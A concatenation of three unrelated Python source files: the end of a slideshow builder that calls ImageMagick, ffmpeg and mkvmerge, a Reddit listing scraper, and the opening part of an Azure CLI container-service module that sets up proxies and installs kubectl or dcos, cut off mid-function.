cmd = [self.exe['ffmpeg'], '-i', f, '-c:a', 'aac', '-strict', '-2', '-b:a', '256k', out] subprocess.check_call(cmd, stderr=subprocess.DEVNULL) self.aac_files.append(out) self.aac_files.sort() def create_audio_only_mkv(self): self.outfile = os.path.join(self.tmp, 'audio_only.mkv') opts = os.path.join(self.tmp, 'audio_only.txt') sbr = '--aac-is-sbr\n1\n' with open(opts, 'w', encoding='utf-8') as fp: fp.write('-o\n{}\n'.format(self.outfile.replace('\\', '/'))) fp.write(sbr) fp.write('{}\n'.format(self.aac_files[0].replace('\\', '/'))) for f in self.aac_files[1:]: fp.write(sbr) 
fp.write('+{}\n'.format(f.replace('\\', '/'))) cmd = [self.exe['mkvmerge'], '@{}'.format(opts)] subprocess.check_call(cmd, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL) class Muxer(Base): def __init__(self, video_file, audio_file, outfile, workdir=None, executables=None): Base.__init__(self, workdir, executables, outfile) self.video_file = video_file self.audio_file = audio_file self._counter = 1 def mux(self): if not os.path.isfile(self.audio_file): shutil.copy(self.video_file, self.outfile) return vid_dur = _get_duration(self.video_file, self.exe['ffmpeg']) aud_dur = _get_duration(self.audio_file, self.exe['ffmpeg']) while True: if aud_dur < vid_dur: self._double_audio() aud_dur = _get_duration(self.audio_file, self.exe['ffmpeg']) else: break out = os.path.join(self.tmp, 'audio-cut-%02d.mkv') cmd = [self.exe['mkvmerge'], '-o', out, '--split', 'timecodes:{}'.format(get_timecode(vid_dur)), self.audio_file] subprocess.check_call(cmd, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL) self.audio_file = os.path.join(self.tmp, 'audio-cut-01.mkv') cmd = [self.exe['mkvmerge'], '-o', self.outfile, self.video_file, self.audio_file] subprocess.check_call(cmd, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL) def _double_audio(self): out = os.path.join(self.tmp, 'audio-{:>02d}.mkv'.format(self._counter)) self._counter += 1 cmd = [self.exe['mkvmerge'], '-o', out, self.audio_file, '+', self.audio_file] subprocess.check_call(cmd, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL) self.audio_file = out def _worker(builder, queue): for desc, t in builder: print(desc, '| Duration: {:.1f}s'.format(t)) queue.put(builder.outfile) def slideshow(pictures, audio_files=None, remove_tempfiles=True, output='slideshow.mkv', **kwargs): if 'profile' in kwargs and not isinstance(kwargs['profile'], Profile): kwargs['profile'] = PROFILES[kwargs['profile'].lower()] if not output.lower().endswith('.mkv'): output = '{}.mkv'.format(output) kwargs['remove_tempfiles'] = remove_tempfiles workdir = kwargs.get('workdir', None) executables = kwargs.get('executables', None) start = time.time() vbuilder = VideoBuilder(pictures, **kwargs) vqueue = mp.Queue(1) vprocess = mp.Process(target=_worker, args=(vbuilder, vqueue)) vprocess.start() if audio_files: abuilder = AudioBuilder(audio_files, workdir, executables) aqueue = mp.Queue(1) aprocess = mp.Process(target=_worker, args=(abuilder, aqueue)) aprocess.start() while True: if not vprocess.is_alive(): if audio_files and not aprocess.is_alive(): break print(next(_P), end='\r', file=sys.stderr, flush=True) time.sleep(0.2) video = vqueue.get() if audio_files: audio = aqueue.get() muxer = Muxer(video, audio, output, workdir, executables) muxer.mux() else: shutil.copy(video, output) if remove_tempfiles: print('Removing temporary files') vbuilder.cleanup() if audio_files: abuilder.cleanup() muxer.cleanup() duration = time.time() - start print('Duration of the whole process: {}'.format( get_timecode(duration, only_int=True) )) return output def recurse(folder): folder = os.path.abspath(folder) for root, _, files in os.walk(folder): for f in files: full = os.path.join(root, f) if what(full) in EXT: yield full def recurse_audio(folder): folder = os.path.abspath(folder) for root, _, files in os.walk(folder): for f in files: full = os.path.join(root, f) if os.path.splitext(f)[1].lower() in AUDIO_EXT: yield full def get_timecode(seconds, only_int=False): """Convert a number of seconds in a timecode (HH:MM:SS.ssss) which MKVMerge can handle. 
:parameters: seconds : Decimal The seconds to convert. only_int : bool If given, the returntype will be HH:MM:SS :returns: Timecode in the format HH:MM:SS.ssss :rtype: str """ minute, second = divmod(int(seconds), 60) hour, minute = divmod(minute, 60) second = seconds - minute * 60 - hour * 3600 if only_int: format_str = '{:0>2d}:{:0>2d}:{:0>2.0f}' else: format_str = '{:0>2d}:{:0>2d}:{:0>7.4f}' return format_str.format(hour, minute, second) def _progress(num, count=None): pass def _get_seconds(s): h, m, s = s.split(':') return int(h) * 3600 + int(m) * 60 + float(s) def _get_duration(filename, ffmpeg): cmd = [ffmpeg, '-i', filename] p = subprocess.Popen(cmd, stderr=subprocess.PIPE) dur = None for line in p.stderr: line = line.decode('utf-8').strip() if 'Duration' in line: tmp = line.split(',')[0] dur = tmp.split()[1] if dur is None: raise ValueError('No duration found for {}'.format(filename)) return _get_seconds(dur) def _get_name(dir_, prefix): root = os.path.abspath(dir_) num = 1 while True: name = os.path.join(root, '{}{:>03d}'.format(prefix, num)) if not os.path.exists(name): return name num += 1 def _pairwise(pictures): a, b = tee(pictures) next(b, None) return zip(a, b) def _get_sample_numbers(max_num): nums = set() while True: num = randint(0, max_num - 1) nums.add(num) if len(nums) == 4: return nums def _get_pictures(files_and_folders): files = [] for item in files_and_folders: if not isinstance(item, str): files.extend(list(item)) elif os.path.isfile(item): pic = os.path.abspath(item) if what(pic) in EXT: files.append(pic) elif os.path.isdir(item): root = os.path.abspath(item) for f in os.listdir(root): full = os.path.join(root, f) if what(full) in EXT: files.append(full) return files def _get_audio(files_and_folders): files = [] for item in files_and_folders: if not isinstance(item, str): files.extend(list(item)) elif os.path.isfile(item): f = os.path.abspath(item) ext = os.path.splitext(f)[1].lower() if ext in AUDIO_EXT: files.append(f) elif os.path.isdir(item): root = os.path.abspath(item) for f in os.listdir(root): full = os.path.join(root, f) ext = os.path.splitext(f)[1].lower() if ext in AUDIO_EXT: files.append(full) return files def paste_buildfile(args): with open(args.output, 'w', encoding='utf-8') as fp: fp.write(BUILDFILE_CONTENT) def print_fonts(args): p = subprocess.Popen( [args.convert, '-list', 'font'], stdout=subprocess.PIPE, stderr=subprocess.DEVNULL ) fonts = [] default_font_found = False for line in p.stdout: line = line.decode('utf-8').strip() if 'Font:' in line: font = line.split()[1].strip() fonts.append(font) if font == DEFAULT_FONT: default_font_found = True p.wait() print('') count = len(fonts) + 1 for f in fonts: print(' *', f) found = '(not found on your system)' if not default_font_found else '' print(' ** Default font:', DEFAULT_FONT, found) print('') print('Found {} fonts.'.format(count)) print('') def find_progs(args): print('') print('Looking for ImageMagick') for prog in ('convert', 'montage', 'mogrify'): p = shutil.which(prog) print(' * {}: {}'.format(prog, p or 'not found')) print('') print('Looking for ffmpeg') p = shutil.which('ffmpeg') print(' * ffmpeg: {}'.format(p or 'not found')) print('') print('Looking for mkvtoolnix') p = shutil.which('mkvmerge') print(' * mkvmerge: {}'.format(p or 'not found')) print('') print('If one or more components are not found, install them or give ' 'the full path to the executables in your buildfile or on the ' 'commandline.') print('') def _get_file(filename): with open(filename, encoding='utf-8') as fp: 
return fp.read() def _get_audio_from_file(filename): tracks = [] with open(filename, encoding='utf-8') as fp: for f in fp: f = f.strip() if not f: continue if f.startswith('+'): tracks.append(recurse_audio(f[1:].strip())) else: tracks.append(f) return tracks def _get_images_from_file(filename): images = [] with open(filename, encoding='utf-8') as fp: for f in fp: f = f.strip() if not f: continue if f.startswith('+'): images.append(recurse(f[1:].strip())) else: images.append(f) return images def _slideshow(args): args = vars(args) _audio = args.pop('audio_files') audio_files = [] for f in _audio: if f.startswith('+'): audio_files.append(recurse_audio(f[1:])) elif f.startswith('@'): audio_files.extent(_get_audio_from_file(f[1:])) else: audio_files.append(f) _img = args.pop('images') images = [] for f in _img: if f.startswith('+'): images.append(recurse(f[1:])) elif f.startswith('@'): images.extent(_get_images_from_file(f[1:])) else: images.append(f) for k in ('title', 'epilog'): if args[k].startswith('@'): args[k] = _get_file(args[k][1:]) args['executables'] = { 'convert': args.pop('convert'), 'montage': args.pop('montage'), 'mogrify': args.pop('mogrify'), 'ffmpeg': args.pop('ffmpeg'), 'mkvmerge': args.pop('mkvmerge'), } del args['version'] del args['func'] print(args) # return slideshow(images, audio_files, **args) def main(): _convert = 'convert.exe' if os.name == 'nt' else 'convert' _montage = 'montage.exe' if os.name == 'nt' else 'montage' _mogrify = 'mogrify.exe' if os.name == 'nt' else 'mogrify' _ffmpeg = 'ffmpeg.exe' if os.name == 'nt' else 'ffmpeg' _mkv = 'mkvmerge.exe' if os.name == 'nt' else 'mkvmerge' p = ArgumentParser( description='Create slideshows with transitions, title slide and ' 'music from any number of images as MKV file.', prog='ffmagick', epilog='Needed external software: ImageMagick, ffmpeg, mkvmerge' ) p.add_argument('--version', action='store_true', default=False, help='Print version info and exit') subparsers = p.add_subparsers(title='Actions') p_fonts = subparsers.add_parser( 'list_fonts', help='List fonts known by your convert program', aliases=['lf'] ) p_fonts.add_argument('--convert', default=_convert, help='Path to ' 'convert(.exe) binary (default: %(default)s)') p_fonts.set_defaults(func=print_fonts) p_progs = subparsers.add_parser( 'list_progs', help='Try to find the needed external programs and ' 'list them', aliases=['lp'] ) p_progs.set_defaults(func=find_progs) p_build = subparsers.add_parser( 'buildfile', help='Create a default buildfile in the current working ' 'directory or at a location given with the -o option', aliases=['bf'] ) p_build.add_argument('-o', '--output', default='ffmagick_build.py', help='Name of the buildfile (default: %(default)s)') p_build.set_defaults(func=paste_buildfile) p_slide = subparsers.add_parser( 'slideshow', help='Build a slideshow with the given parameters', epilog='You can prefix the values for title and epilog with an @ ' 'to indicate that the value is a file.', aliases=['sl'] ) p_slide.add_argument('images', nargs='+', help='Give all your images/' 'image folders here. Prefix folders with a + to ' 'indicate that they should be searched recursive. ' 'If prefixed with an @ values are read from file ' '(one per line)') p_slide.add_argument('-a', '--audio-files', nargs='+', default=[], help='Give all your audio files/folders here. Prefix ' 'folders with a + to indicate that they should be ' 'searched recursive. 
If prefixed with an @ values ' 'are read from file (one per line)') p_slide.add_argument('-p', '--profile', choices=list(PROFILES.keys()), default='1080p', help='Output profile (default: ' '%(default)s)') p_slide.add_argument('--image-duration', type=int, default=5, help='Duration for an image to show in seconds ' '(default: %(default)s)') p_slide.add_argument('--transition-duration', type=int, default=1, help='Duration for the transition effect between ' 'two images in seconds (default: %(default)s)') p_slide.add_argument('-f', '--font', default=DEFAULT_FONT, help='Give a fontname or an absolute path to a ' '.ttf file here (default: %(default)s)') p_slide.add_argument('-t', '--title', default='', help='Title for the ' 'slideshow (shown on the first slide)') p_slide.add_argument('-A', '--author', default='', help='Author of the ' 'slideshow (shown on the last slide).') p_slide.add_argument('-e', '--epilog', default='', help='Epilog for the ' 'slideshow (shown on the last slide, use `\\n` for ' 'linebreaks)') p_slide.add_argument('--background', default='black', help='Color behind text and images (default: ' '%(default)s)') p_slide.add_argument('--textcolor', default='white', help='Color for ' 'text (default: %(default)s)') p_slide.add_argument('-w', '--workdir', default=None, help='Directory ' 'for temporary files. If not given, the default ' 'temporary directory of your system is used') p_slide.add_argument('-r', '--remove-tempfiles', action='store_false', default=True, help='Clean temporary files and ' 'directories when all work is done (default: ' '%(default)s)') p_slide.add_argument('-o', '--output', default='slideshow.mkv', help='Name (and path) for the final output file ' '(default: %(default)s)') p_slide.add_argument('--convert', default=_convert, help='Path to ' 'convert(.exe) binary (default: %(default)s)') p_slide.add_argument('--montage', default=_montage, help='Path to ' 'montage(.exe) binary (default: %(default)s)') p_slide.add_argument('--mogrify', default=_mogrify, help='Path to ' 'mogrify(.exe) binary (default: %(default)s)') p_slide.add_argument('--ffmpeg', default=_ffmpeg, help='Path to ' 'ffmpeg(.exe) binary (default: %(default)s)') p_slide.add_argument('--mkvmerge', default=_mkv, help='Path to ' 'mkvmerge(.exe) binary (default: %(default)s)') p_slide.set_defaults(func=_slideshow) args = p.parse_args() if args.version: print('ffmagick version {}'.format(__version__)) sys.exit() args.func(args) if __name__ == '__main__': main()
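# ---------------------------------------------------------------------------
# Illustrative usage sketch (not part of the original file).  The folder and
# file names below are placeholders, and it assumes ImageMagick, ffmpeg and
# mkvmerge are on PATH and that VideoBuilder's remaining options all have
# usable defaults.
def _example_build():
    """Hypothetical helper showing the public entry points defined above."""
    # The timecode helpers round-trip: 3725.5 s -> '01:02:05.5000' -> 3725.5 s.
    assert abs(_get_seconds(get_timecode(3725.5)) - 3725.5) < 1e-6
    # Build a 1080p slideshow from one picture folder and one audio file.
    return slideshow(['my_pictures'], audio_files=['background.mp3'],
                     profile='1080p', output='example.mkv')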
worldnews.py
import re from bs4 import BeautifulSoup from bs4 import SoupStrainer import os import httplib2 from multiprocessing import Pool c=0 import requests from datetime import datetime import multiprocessing from multiprocessing import current_process import time import os import sys FORMAT = '%d-%m-%Y %H:%M:%S' def make_soup(s): match=re.compile('https://|http://|www.|.com|.in|.org|gov.in') if re.search(match,s): while(True): try: http = httplib2.Http() break except: continue while(True): try: status, response = http.request(s) break except: continue while(True): try: page = BeautifulSoup(response,"html.parser",parse_only=SoupStrainer('div')) break except: continue return page else: return None def test_internet(): while(True): try: http = httplib2.Http() status, response = http.request("https://www.google.com") break except: continue def parse1(s): global c temp_set=set() soup=make_soup(s) if(soup!=None): for div in soup.find_all('div',class_=[ "thing" , "id-t3_3ua12m" ,"linkflair" , "linkflair-normal" , "odd" , "link"]): try: if(div.p!=None and div.p.next_sibling!=None and div.p.next_sibling.next_sibling!=None): x=div.p.next_sibling.next_sibling.next_sibling['class'] if(x[0]=='entry'): element='\nPROMPT '+str(c+1)+'\n' if(div.p.next_sibling.next_sibling.next_sibling!=None and div.p.next_sibling.next_sibling.next_sibling.p!=None and div.p.next_sibling.next_sibling.next_sibling.p.a!=None): element=element+div.p.next_sibling.next_sibling.next_sibling.p.a.string+'\n' element=element+div.p.next_sibling.next_sibling.next_sibling.p.a['href']+'\n' if(div.p.next_sibling.next_sibling.next_sibling.find('p',{'class':'tagline'})!=None and div.p.next_sibling.next_sibling.next_sibling.find('p',{'class':'tagline'}).time!=None): element=element+div.p.next_sibling.next_sibling.next_sibling.find('p',{'class':'tagline'}).time['datetime']+'\t' element=element+div.p.next_sibling.next_sibling.next_sibling.find('p',{'class':'tagline'}).time['title']+'\t' element=element+div.p.next_sibling.next_sibling.next_sibling.find('p',{'class':'tagline'}).time.string+'\n' if(div.p.next_sibling.next_sibling.next_sibling.find('p',{'class':'tagline'})!=None and div.p.next_sibling.next_sibling.next_sibling.find('p',{'class':'tagline'}).a!=None): element=element+div.p.next_sibling.next_sibling.next_sibling.find('p',{'class':'tagline'}).a.string+'\n' element=element+div.p.next_sibling.next_sibling.next_sibling.find('p',{'class':'tagline'}).text+'\n' if(div.div.find('div',{'class':'score likes'})!=None): element=element+'score likes '+div.div.find('div',{'class':'score likes'}).string+'\t' element=element+'score dislikes '+div.div.find('div',{'class':'score dislikes'}).string+'\t' element=element+'score unvoted '+div.div.find('div',{'class':'score unvoted'}).string+'\n\n' f.write(element) c=c+1 elif(x[0]=='thumbnail'): element='\nPROMPT '+str(c+1)+'\n' if(div.find('div',{'class':'entry unvoted'})!=None and div.find('div',{'class':'entry unvoted'}).p!=None and div.find('div',{'class':'entry unvoted'}).p.a!=None and div.find('div',{'class':'entry unvoted'}).p.a.string!=None): element=element+div.find('div',{'class':'entry unvoted'}).p.a.string+'\n' element=element+div.find('div',{'class':'entry unvoted'}).p.a['href']+'\n' if(div.find('div',{'class':'entry unvoted'}).find('p',{'class':'tagline'})!=None and div.find('div',{'class':'entry unvoted'}).find('p',{'class':'tagline'}).time != None): element=element+div.find('div',{'class':'entry unvoted'}).find('p',{'class':'tagline'}).time['datetime']+'\t' 
element=element+div.find('div',{'class':'entry unvoted'}).find('p',{'class':'tagline'}).time['title']+'\t' element=element+div.find('div',{'class':'entry unvoted'}).find('p',{'class':'tagline'}).time.string+'\n' if(div.find('div',{'class':'entry unvoted'}).find('p',{'class':'tagline'}).a!=None): element=element+div.find('div',{'class':'entry unvoted'}).find('p',{'class':'tagline'}).a.string+'\n' element=element+div.find('div',{'class':'entry unvoted'}).find('p',{'class':'tagline'}).text+'\n' if(div.p.next_sibling.next_sibling.find('div',{'class':'score likes'})!=None and div.p.next_sibling.next_sibling.find('div',{'class':'score dislikes'})!=None and div.p.next_sibling.next_sibling.find('div',{'class':'score unvoted'})!=None): element=element+'score likes '+div.p.next_sibling.next_sibling.find('div',{'class':'score likes'}).string+'\t\t' element=element+'score dislikes '+div.p.next_sibling.next_sibling.find('div',{'class':'score dislikes'}).string+'\t\t' element=element+'score unvoted '+div.p.next_sibling.next_sibling.find('div',{'class':'score unvoted'}).string+'\n' f.write(element) c=c+1 except: continue def count_next_of_current(s,m): soup=make_soup(s) y='https://www.reddit.com/r/'+m+'/'+select_tab+'/?count=' match=re.compile(y) for link in soup.find_all('a',{'rel':['next']}): href=link['href'] return href def read_reddit_images(change_file_number,m,x): global f global select_tab select_tab=x x=m+'_'+select_tab+'.txt' #test_internet() s='https://www.reddit.com/r/'+m+'/'+select_tab soup=make_soup(s) f=open(x,'a',encoding='utf-8') f.write('\n\n\n\niteration number '+str(change_file_number)+' '+datetime.now().strftime(FORMAT)+'\n\n') maximum_number_of_next_pages=7 parse1(s) count=0 print('for '+m+' '+select_tab+' current page number is'+'\n'+str(count)) while(count<maximum_number_of_next_pages): s=count_next_of_current(s,m) if(s!=None): parse1(s) count=count+1 print(count) else: break f.write('\n\niteration number '+str(change_file_number)+' '+datetime.now().strftime(FORMAT)+'\n\n') f.close() def main(m,i): read_reddit_images(i,m,'new') read_reddit_images(i,m,'hot') read_reddit_images(i,m,'top') read_reddit_images(i,m,'rising') read_reddit_images(i,m,'controversial') read_reddit_images(i,m,'gilded') if __name__ == "__main__": processes = [] arguments = sys.argv[2:]#it was b for x in arguments: print(x) p = multiprocessing.Process(target=main, args=(str(x),int(sys.argv[1]), )) p.start() processes.append(p) for p in processes: p.join() my.close()
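# ---------------------------------------------------------------------------
# Illustrative invocation sketch (not part of the original file).  The script
# takes an iteration number followed by one or more subreddit names, scrapes
# each subreddit in its own process and appends to files such as
# "worldnews_new.txt":
#
#     python worldnews.py 1 worldnews politics
#
# Calling main() directly is roughly equivalent (this relies on the
# module-level multiprocessing import above; the subreddit names are
# placeholders):
def _example_scrape(iteration=1, subreddits=('worldnews', 'politics')):
    procs = [multiprocessing.Process(target=main, args=(s, iteration))
             for s in subreddits]
    for p in procs:
        p.start()
    for p in procs:
        p.join()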
custom.py
# -------------------------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in the project root for license information. # -------------------------------------------------------------------------------------------- from __future__ import print_function import binascii import datetime import errno import json import os import os.path import platform import random import re import ssl import stat import string import subprocess import sys import tempfile import threading import time import uuid import webbrowser from six.moves.urllib.request import urlopen # pylint: disable=import-error from six.moves.urllib.error import URLError # pylint: disable=import-error import yaml import dateutil.parser from dateutil.relativedelta import relativedelta from knack.log import get_logger from knack.util import CLIError from msrestazure.azure_exceptions import CloudError import requests from azure.cli.command_modules.acs import acs_client, proxy from azure.cli.command_modules.acs._params import regions_in_preview, regions_in_prod from azure.cli.core.api import get_config_dir from azure.cli.core._profile import Profile from azure.cli.core.commands.client_factory import get_mgmt_service_client from azure.cli.core.keys import is_valid_ssh_rsa_public_key from azure.cli.core.util import in_cloud_console, shell_safe_json_parse, truncate_text, sdk_no_wait from azure.graphrbac.models import (ApplicationCreateParameters, PasswordCredential, KeyCredential, ServicePrincipalCreateParameters, GetObjectsParameters) from azure.mgmt.containerservice.models import ContainerServiceLinuxProfile from azure.mgmt.containerservice.models import ContainerServiceNetworkProfile from azure.mgmt.containerservice.models import ContainerServiceOrchestratorTypes from azure.mgmt.containerservice.models import ContainerServiceServicePrincipalProfile from azure.mgmt.containerservice.models import ContainerServiceSshConfiguration from azure.mgmt.containerservice.models import ContainerServiceSshPublicKey from azure.mgmt.containerservice.models import ContainerServiceStorageProfileTypes from azure.mgmt.containerservice.models import ManagedCluster from azure.mgmt.containerservice.models import ManagedClusterAADProfile from azure.mgmt.containerservice.models import ManagedClusterAddonProfile from azure.mgmt.containerservice.models import ManagedClusterAgentPoolProfile from ._client_factory import cf_container_services from ._client_factory import cf_resource_groups from ._client_factory import get_auth_management_client from ._client_factory import get_graph_rbac_management_client from ._client_factory import cf_resources logger = get_logger(__name__) # pylint:disable=too-many-lines,unused-argument def which(binary): path_var = os.getenv('PATH') if platform.system() == 'Windows': binary = binary + '.exe' parts = path_var.split(';') else: parts = path_var.split(':') for part in parts: bin_path = os.path.join(part, binary) if os.path.exists(bin_path) and os.path.isfile(bin_path) and os.access(bin_path, os.X_OK): return bin_path return None def wait_then_open(url): """ Waits for a bit then opens a URL. Useful for waiting for a proxy to come up, and then open the URL. """ for _ in range(1, 10): try: urlopen(url, context=_ssl_context()) except URLError: time.sleep(1) break webbrowser.open_new_tab(url) def wait_then_open_async(url): """ Spawns a thread that waits for a bit then opens a URL. 
""" t = threading.Thread(target=wait_then_open, args=({url})) t.daemon = True t.start() def acs_browse(cmd, client, resource_group, name, disable_browser=False, ssh_key_file=None): """ Opens a browser to the web interface for the cluster orchestrator :param name: Name of the target Azure container service instance. :type name: String :param resource_group_name: Name of Azure container service's resource group. :type resource_group_name: String :param disable_browser: If true, don't launch a web browser after estabilishing the proxy :type disable_browser: bool :param ssh_key_file: If set a path to an SSH key to use, only applies to DCOS :type ssh_key_file: string """ acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group) _acs_browse_internal(cmd, client, acs_info, resource_group, name, disable_browser, ssh_key_file) def _acs_browse_internal(cmd, client, acs_info, resource_group, name, disable_browser, ssh_key_file): orchestrator_type = acs_info.orchestrator_profile.orchestrator_type # pylint: disable=no-member if str(orchestrator_type).lower() == 'kubernetes' or \ orchestrator_type == ContainerServiceOrchestratorTypes.kubernetes or \ (acs_info.custom_profile and acs_info.custom_profile.orchestrator == 'kubernetes'): # pylint: disable=no-member return k8s_browse(cmd, client, name, resource_group, disable_browser, ssh_key_file=ssh_key_file) elif str(orchestrator_type).lower() == 'dcos' or orchestrator_type == ContainerServiceOrchestratorTypes.dcos: return _dcos_browse_internal(acs_info, disable_browser, ssh_key_file) else: raise CLIError('Unsupported orchestrator type {} for browse'.format(orchestrator_type)) def k8s_browse(cmd, client, name, resource_group, disable_browser=False, ssh_key_file=None): """ Launch a proxy and browse the Kubernetes web UI. :param disable_browser: If true, don't launch a web browser after estabilishing the proxy :type disable_browser: bool """ acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group) _k8s_browse_internal(name, acs_info, disable_browser, ssh_key_file) def _k8s_browse_internal(name, acs_info, disable_browser, ssh_key_file): if not which('kubectl'): raise CLIError('Can not find kubectl executable in PATH') browse_path = os.path.join(get_config_dir(), 'acsBrowseConfig.yaml') if os.path.exists(browse_path): os.remove(browse_path) _k8s_get_credentials_internal(name, acs_info, browse_path, ssh_key_file, False) logger.warning('Proxy running on 127.0.0.1:8001/ui') logger.warning('Press CTRL+C to close the tunnel...') if not disable_browser: wait_then_open_async('http://127.0.0.1:8001/ui') subprocess.call(["kubectl", "--kubeconfig", browse_path, "proxy"]) def dcos_browse(cmd, client, name, resource_group, disable_browser=False, ssh_key_file=None): """ Creates an SSH tunnel to the Azure container service, and opens the Mesosphere DC/OS dashboard in the browser. :param name: name: Name of the target Azure container service instance. :type name: String :param resource_group_name: Name of Azure container service's resource group. 
:type resource_group_name: String :param disable_browser: If true, don't launch a web browser after estabilishing the proxy :type disable_browser: bool :param ssh_key_file: Path to the SSH key to use :type ssh_key_file: string """ acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group) _dcos_browse_internal(acs_info, disable_browser, ssh_key_file) def _dcos_browse_internal(acs_info, disable_browser, ssh_key_file): if not os.path.isfile(ssh_key_file): raise CLIError('Private key file {} does not exist'.format(ssh_key_file)) acs = acs_client.ACSClient() if not acs.connect(_get_host_name(acs_info), _get_username(acs_info), key_filename=ssh_key_file): raise CLIError('Error connecting to ACS: {}'.format(_get_host_name(acs_info))) octarine_bin = '/opt/mesosphere/bin/octarine' if not acs.file_exists(octarine_bin): raise CLIError('Proxy server ({}) does not exist on the cluster.'.format(octarine_bin)) proxy_id = _rand_str(16) proxy_cmd = '{} {}'.format(octarine_bin, proxy_id) acs.run(proxy_cmd, background=True) # Parse the output to get the remote PORT proxy_client_cmd = '{} --client --port {}'.format(octarine_bin, proxy_id) stdout, _ = acs.run(proxy_client_cmd) remote_port = int(stdout.read().decode().strip()) local_port = acs.get_available_local_port() # Set the proxy proxy.set_http_proxy('127.0.0.1', local_port) logger.warning('Proxy running on 127.0.0.1:%s', local_port) logger.warning('Press CTRL+C to close the tunnel...') if not disable_browser: wait_then_open_async('http://127.0.0.1') try: acs.create_tunnel( remote_host='127.0.0.1', remote_port=remote_port, local_port=local_port) finally: proxy.disable_http_proxy() return def acs_install_cli(cmd, client, resource_group, name, install_location=None, client_version=None): acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group) orchestrator_type = acs_info.orchestrator_profile.orchestrator_type # pylint: disable=no-member kwargs = {'install_location': install_location} if client_version: kwargs['client_version'] = client_version if orchestrator_type == 'kubernetes': return k8s_install_cli(**kwargs) elif orchestrator_type == 'dcos': return dcos_install_cli(**kwargs) else: raise CLIError('Unsupported orchestrator type {} for install-cli'.format(orchestrator_type)) def _ssl_context(): if sys.version_info < (3, 4) or (in_cloud_console() and platform.system() == 'Windows'): try: return ssl.SSLContext(ssl.PROTOCOL_TLS) # added in python 2.7.13 and 3.6 except AttributeError: return ssl.SSLContext(ssl.PROTOCOL_TLSv1) return ssl.create_default_context() def _urlretrieve(url, filename): req = urlopen(url, context=_ssl_context()) with open(filename, "wb") as f: f.write(req.read()) def dcos_install_cli(cmd, install_location=None, client_version='1.8'): """ Downloads the dcos command line from Mesosphere """ system = platform.system() if not install_location: raise CLIError( "No install location specified and it could not be determined from the current platform '{}'".format( system)) base_url = 'https://downloads.dcos.io/binaries/cli/{}/x86-64/dcos-{}/{}' if system == 'Windows': file_url = base_url.format('windows', client_version, 'dcos.exe') elif system == 'Linux': # TODO Support ARM CPU here file_url = base_url.format('linux', client_version, 'dcos') elif system == 'Darwin': file_url = base_url.format('darwin', client_version, 'dcos') else: raise CLIError('Proxy server ({}) does not exist on the cluster.'.format(system)) logger.warning('Downloading client to %s', install_location) try: _urlretrieve(file_url, install_location) 
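    # The next call marks the downloaded binary as executable for owner, group
    # and others by OR-ing the execute bits onto its current mode (the Python
    # equivalent of `chmod +x`).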
os.chmod(install_location, os.stat(install_location).st_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH) except IOError as err: raise CLIError('Connection error while attempting to download client ({})'.format(err)) def k8s_install_cli(cmd, client_version='latest', install_location=None): """Install kubectl, a command-line interface for Kubernetes clusters.""" if client_version == 'latest': context = _ssl_context() version = urlopen('https://storage.googleapis.com/kubernetes-release/release/stable.txt', context=context).read() client_version = version.decode('UTF-8').strip() else: client_version = "v%s" % client_version file_url = '' system = platform.system() base_url = 'https://storage.googleapis.com/kubernetes-release/release/{}/bin/{}/amd64/{}' # ensure installation directory exists install_dir, cli = os.path.dirname(install_location), os.path.basename(install_location) if not os.path.exists(install_dir): os.makedirs(install_dir) if system == 'Windows': file_url = base_url.format(client_version, 'windows', 'kubectl.exe') elif system == 'Linux': # TODO: Support ARM CPU here file_url = base_url.format(client_version, 'linux', 'kubectl') elif system == 'Darwin': file_url = base_url.format(client_version, 'darwin', 'kubectl') else: raise CLIError('Proxy server ({}) does not exist on the cluster.'.format(system)) logger.warning('Downloading client to "%s" from "%s"', install_location, file_url) try: _urlretrieve(file_url, install_location) os.chmod(install_location, os.stat(install_location).st_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH) except IOError as ex: raise CLIError('Connection error while attempting to download client ({})'.format(ex)) if system == 'Windows': # be verbose, as the install_location likely not in Windows's search PATHs env_paths = os.environ['PATH'].split(';') found = next((x for x in env_paths if x.lower().rstrip('\\') == install_dir.lower()), None) if not found: # pylint: disable=logging-format-interpolation logger.warning('Please add "{0}" to your search PATH so the `{1}` can be found. 2 options: \n' ' 1. Run "set PATH=%PATH%;{0}" or "$env:path += \'{0}\'" for PowerShell. ' 'This is good for the current command session.\n' ' 2. Update system PATH environment variable by following ' '"Control Panel->System->Advanced->Environment Variables", and re-open the command window. 
' 'You only need to do it once'.format(install_dir, cli)) else: logger.warning('Please ensure that %s is in your search PATH, so the `%s` command can be found.', install_dir, cli) def k8s_install_connector(cmd, client, name, resource_group_name, connector_name='aci-connector', location=None, service_principal=None, client_secret=None, chart_url=None, os_type='Linux', image_tag=None, aci_resource_group=None): _k8s_install_or_upgrade_connector("install", cmd, client, name, resource_group_name, connector_name, location, service_principal, client_secret, chart_url, os_type, image_tag, aci_resource_group) def k8s_upgrade_connector(cmd, client, name, resource_group_name, connector_name='aci-connector', location=None, service_principal=None, client_secret=None, chart_url=None, os_type='Linux', image_tag=None, aci_resource_group=None): _k8s_install_or_upgrade_connector("upgrade", cmd, client, name, resource_group_name, connector_name, location, service_principal, client_secret, chart_url, os_type, image_tag, aci_resource_group) def _k8s_install_or_upgrade_connector(helm_cmd, cmd, client, name, resource_group_name, connector_name, location, service_principal, client_secret, chart_url, os_type, image_tag, aci_resource_group): from subprocess import PIPE, Popen instance = client.get(resource_group_name, name) helm_not_installed = 'Helm not detected, please verify if it is installed.' url_chart = chart_url if image_tag is None: image_tag = 'latest' # Check if Helm is installed locally try: Popen(["helm"], stdout=PIPE, stderr=PIPE) except OSError: raise CLIError(helm_not_installed) # If SPN is specified, the secret should also be specified if service_principal is not None and client_secret is None: raise CLIError('--client-secret must be specified when --service-principal is specified') # Validate if the RG exists rg_location = _get_rg_location(cmd.cli_ctx, aci_resource_group or resource_group_name) # Auto assign the location if location is None: location = rg_location norm_location = 